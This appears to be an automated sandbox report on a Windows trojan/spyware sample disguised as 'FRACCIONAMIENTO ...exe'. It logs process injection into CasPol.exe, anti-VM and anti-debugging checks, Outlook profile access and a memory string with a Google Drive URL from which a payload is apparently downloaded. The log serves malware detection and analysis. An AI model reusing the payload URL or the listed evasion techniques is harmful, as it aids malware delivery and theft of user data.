Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9749 1_2_033D9749
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D7ED6 1_2_033D7ED6
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0723 1_2_033D0723
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0376 1_2_033D0376
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FB4 1_2_033D3FB4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0388 1_2_033D0388
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D8FFD 1_2_033D8FFD
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D07D2 1_2_033D07D2
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D03C2 1_2_033D03C2
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D061C 1_2_033D061C
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E0A 1_2_033D3E0A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9260 1_2_033D9260
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4263 1_2_033D4263
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D06AF 1_2_033D06AF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4299 1_2_033D4299
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D091B 1_2_033D091B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1D44 1_2_033D1D44
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D059F 1_2_033D059F
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3DE4 1_2_033D3DE4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D043D 1_2_033D043D
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D081D 1_2_033D081D
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1010 1_2_033D1010
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0898 1_2_033D0898
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1C91 1_2_033D1C91
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D04FA 1_2_033D04FA
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D1CE6 1_2_033D1CE6
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D48D3 1_2_033D48D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD05D0 3_2_00AD05D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD2A90 3_2_00AD2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADD3E0 3_2_00ADD3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD37D2 3_2_00AD37D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADEFB0 3_2_00ADEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D076B62 3_2_1D076B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D07A160 3_2_1D07A160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D079890 3_2_1D079890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_1D079548 3_2_1D079548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057C108 3_2_2057C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057EC30 3_2_2057EC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_2057D3D8 3_2_2057D3D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_20571618 3_2_20571618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D5860 3_2_209D5860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D0BA0 3_2_209D0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_209D0B91 3_2_209D0B91
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D9749 NtAllocateVirtualMemory, 1_2_033D9749
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: invalid certificate
Source: FRACCIONAMIENTO 1722403906461L.exe Virustotal: Detection: 27%
Source: FRACCIONAMIENTO 1722403906461L.exe ReversingLabs: Detection: 12%
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File read: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File created: C:\Users\user\AppData\Local\Temp\nsq6822.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/13@3/3
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:956:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Finlandsrejserne
Source: FRACCIONAMIENTO 1722403906461L.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation

Source: Yara match File source: 00000003.00000000.15477945295.0000000000BC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.16137261344.00000000033CC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_713130C0 push eax; ret 1_2_713130EE
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CFF11 push ebx; iretd 1_2_033CFF12
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CE2B4 push ebp; retf 1_2_033CE315
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CE2FB push ebp; retf 1_2_033CE315
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00AD84B7 push edi; retn 0000h 3_2_00AD84B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_205708DA push eax; iretd 3_2_205708E1
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71311BFF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File created: C:\Users\user\AppData\Local\Temp\nsr68C1.tmp\System.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1P1TRVKFKYHZLCDSRI8V2K0ECN7S0SK7E
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEP
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3432 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4904 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CCB37 rdtsc 1_2_033CCB37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9376
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe API call chain: ExitProcess graph end node
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1p1TrvkFKYHzlCDSRi8V2K0EcN7S0sk7E
Source: CasPol.exe, 00000003.00000002.20371041773.0000000000E53000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000003.00000003.15865384687.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.17013199114.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20371570686.0000000000E9D000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000003.00000003.15971915089.0000000000E9C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exewindir=\syswow64\iertutil.dll
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137436673.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20370411559.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exep
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16137797013.0000000005019000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: FRACCIONAMIENTO 1722403906461L.exe, 00000001.00000002.16135483008.000000000070E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CasPol.exe, 00000003.00000002.20373446700.0000000002A19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

Anti Debugging

Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_71311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_71311BFF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033CCB37 rdtsc 1_2_033CCB37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3F47 mov eax, dword ptr fs:[00000030h] 1_2_033D3F47
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FB4 mov ebx, dword ptr fs:[00000030h] 1_2_033D3FB4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D93AE mov eax, dword ptr fs:[00000030h] 1_2_033D93AE
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 mov ebx, dword ptr fs:[00000030h] 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3FA0 mov eax, dword ptr fs:[00000030h] 1_2_033D3FA0
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D0388 mov eax, dword ptr fs:[00000030h] 1_2_033D0388
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D660E mov eax, dword ptr fs:[00000030h] 1_2_033D660E
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E0A mov eax, dword ptr fs:[00000030h] 1_2_033D3E0A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3E6A mov eax, dword ptr fs:[00000030h] 1_2_033D3E6A
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3EFF mov eax, dword ptr fs:[00000030h] 1_2_033D3EFF
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D3DE4 mov eax, dword ptr fs:[00000030h] 1_2_033D3DE4
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D8DDC mov eax, dword ptr fs:[00000030h] 1_2_033D8DDC
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4012 mov ebx, dword ptr fs:[00000030h] 1_2_033D4012
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_033D4081 mov ebx, dword ptr fs:[00000030h] 1_2_033D4081
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 3_2_00ADB910 LdrInitializeThunk, 3_2_00ADB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: BC0000
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\FRACCIONAMIENTO 1722403906461L.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information

Source: Yara match File source: 00000003.00000002.20396460069.000000001D291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
